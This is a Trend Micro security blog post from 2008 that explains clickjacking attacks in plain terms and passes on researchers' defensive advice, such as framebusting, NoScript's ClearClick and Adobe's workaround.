• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Malware   »   Clickjacking Woes

Clickjacking Woes

  • Posted on:October 17, 2008 at 8:18 pm
  • Posted in:Malware
  • Author:
    Jovi Umawing (Technical Communications)
0

Perhaps everyone concerned about online security has heard of clickjacking. This cyberbuzzword was disclosed in the last week of September and remains hot until now. Experts are quite forceful in harping about how scary this new form of cyberjacking is while a lot of us are perhaps still lost—if not confused or complacent—as to what it can really do, why one should be aware of clickjacking, and what we can do to protect ourselves.

Clickjacking, simply put, is stealing mouse cursor clicks from users. In this type of attack, the malicious user can take control of the links that a user can connect to while he/she is in a malicious domain.

For example, a hacker sets up Site A. Site A is actually a cover for certain parts of Site B (a legitimate site the user is a member of). Interaction with Site A is set up such that users clicking any button on Site A is actually clicking, say, “Delete All Files” in Site B. The user, of course, does not know this.

In a more critical example, which suggests how these attacks can remain persistent once initiated, the Flash Security Settings Manager can also be modified to turn off security settings in Flash. (And these are just two versions of several others).

Regarding clickjacking, there are three significant points that should be considered:

  • Clickjacking techniques are used with little or no leniency since clickjacks can take control of how users navigate within the page by, say, making all links in certain a Web page bogus. Consequently, users are allowed to click any link they feel lured to but the clickjacks still end up directing them where hackers want them to.
  • Clickjacks can use any form of link (image link in the form of buttons or text link) to pull users to click them. The sad part is that no user will even know that he/she is already within a hijacked page. Only Web security/reputation services can block the bad pages.
  • Lastly and perhaps the most diabolic is that clickjacking techniques have made the exploit adaptable in certain situations.

    For example, in case a user’s browser has been set to block out JavaScript execution, other methods take in place such as using iframes to harvest user’s click actions.

Security researcher and WhiteHat CTO Jeremiah Grossman, one of the discoverers of this exploit, stated that:

Everyone, including browser vendors, Adobe (plus other plug-in vendors), website owners (framebusting code), and Web users (NoScript) all need their own solutions to assist in case the other don’t do enough or anything at all.

Robert “Rsnake” Hansen, the co-revealer of clickjacking also recommends that users set their browsers’ configuration to “Plugins|Forbid IFRAME” and to install the NoScript widget as a good defense combination against clickjacking attacks. NoScript—a Firefox add-on introduces the feature called ClearClick—which prevents the interaction from completing and reveals the real destination whenever a user clicks his/her mouse or types on his/her keyboard with a hidden element.

At that point, the user can evaluate if the click target was actually the intended one and decide to keep it locked or to unlock it for free interaction.

IMPORTANT: Adobe issued a workaround for this critical security issue. The solution can be found on Adobe’s Security Advisories page.

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: Adobe Flash Playerclickjacking

Featured Stories

  • systemd Vulnerability Leads to Denial of Service on Linux
  • qkG Filecoder: Self-Replicating, Document-Encrypting Ransomware
  • Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
  • A Closer Look at North Korea’s Internet
  • From Cybercrime to Cyberpropaganda

Security Predictions for 2019

  • Our security predictions for 2019 are based on our experts’ analysis of the progress of current and emerging technologies, user behavior, and market trends, and their impact on the threat landscape. We have categorized them according to the main areas that are likely to be affected, given the sprawling nature of the technological and sociopolitical changes under consideration.
    Read our security predictions for 2019.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • February Patch Tuesday: Batch Includes 77 Updates That Cover Flaws in Internet Explorer, Exchange Server, and DHCP Server
  • Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire
  • Windows App Runs on Mac, Downloads Info Stealer and Adware
  • Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners
  • Various Google Play ‘Beauty Camera’ Apps Send Users Pornographic Content, Redirect Them to Phishing Websites and Collect Their Pictures

Popular Posts

  • Going In-depth with Emotet: Multilayer Operating Mechanisms
  • February Patch Tuesday: Batch Includes 77 Updates That Cover Flaws in Internet Explorer, Exchange Server, and DHCP Server
  • Various Google Play ‘Beauty Camera’ Apps Send Users Pornographic Content, Redirect Them to Phishing Websites and Collect Their Pictures
  • Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners
  • Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.